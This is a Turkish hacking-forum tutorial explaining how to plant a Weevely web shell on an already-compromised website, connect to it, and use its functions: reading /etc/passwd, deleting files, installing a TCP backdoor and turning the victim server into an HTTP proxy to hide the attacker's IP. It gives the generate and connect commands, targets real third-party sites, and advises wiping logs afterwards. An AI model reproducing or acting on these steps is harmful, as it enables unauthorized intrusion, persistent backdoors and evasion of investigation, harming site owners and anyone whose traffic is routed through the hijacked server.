Web Serveri Proxy Olarak Kullanma - ANONİM OLMA

22 Ağu 2017
212
5
Gotham

Merhaba . Bugün Başlıkta yazan anlatımı yapacağım.Kaliteli konu olduğu için paylaşmak istedim.Başlayalım.

Ya brute forceden bir site düşürdünüz ya sql injection dan admin panele daldınız ya da bypass açığıyla içeri daldınız hiç farketmez.Buraya kadar gelip shell atabiliyor durumda olmanız yeterli.
Normal bir shell atmaktan farkı yok.Ama kullanımında büyük kolaylıklar var .
Weeveley aracının çok kullanışlı fonksiyonları sayesinde neler neler yapabiliriz.Ben birkaç tanesine değineceğim.O halde başlayalım.

1.ADIM :
Kali Linux ta bir terminal açalım.Weevely aracıyla shell oluşturup bir şifre belirmelek için
Kod:
weevely generate şifre /dosyayolu/
temel mantık bu.Şifre yazan kısma yazdığınız şifreyi unutmayın.İleride bağlanırken kullanacağız.
kjtARQ.png


2.ADIM :
Shell dosyamızı hedef web sitesi üzerinden upload edilir.
NOT: Benim şuan gerçek web serveri üzerinde anlatım yapma imkanım yok o yüzden localhost üzerinden yaptım.Bende localhost yazan yerde sizde bir web sitesi yer alacak.

3.ADIM :
Upload ettiğiniz shell dosyasının linkini kopyalayın.Ve terminale gelip
Kod:
weevely  http://hedefsite.net/shellyolu.php  weevely_şifresi
Buna uyarlayın yani
11aoan.png


4.ADIM :
Bu adımda weevely fonksiyonlarını kullanabilirsiniz.Fonksiyonlar listesini help yazarak görüntüleyebilirsiniz.
fEl1qz.png


Birkaç Tane Fonksiyon İnceleyelim:

:system_info : Sistem bilgisini görüntüler
:file_upload : Dosya upload eder
:file_rm : Belirtilen dosyayı siler
:audit_etwpasswd : linuxda /etc/passwd dosyasını görüntüler
:backdoor_tcp : arka kapı(backdoor) yerleştirir
:net_proxy : web serverini proxy olarak kullan(MEALİ : web serveri kölen yapmak )


XPSdrd.png




Web Serverini Http Proxy Olarak Kullanma(WEB SERVERİNİ KÖLEMİZ YAPMAK) :16::24:
İşlemi başlatmak için
Z2EjAY.png


İşlemi başlatttıktan sonra tarayıcınızın proxy ayarlarına gidin ve proxy olarak size verilen adresi yapın.
pnCuRN.png


Sonra ip adresinizi gösteren siteleri gidin ve sonucu görün.Eğer weevelyi kapatırsanız proxy duracaktır.İşleminiz bittiğinde logları silmeyi unutmayın.Bu anlattıklarmla sınırlı kalmayın çok değişik combolar yapılabilir.
Türkçe kaynak yoktu.Yabancı kaynaklarda bulunan ve uzun uğraş sonucu bulduğum bir bilgidir. #Emeğe saygı . Başka anlatımlarda görüşmek üzere .

 
Son düzenleme:
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.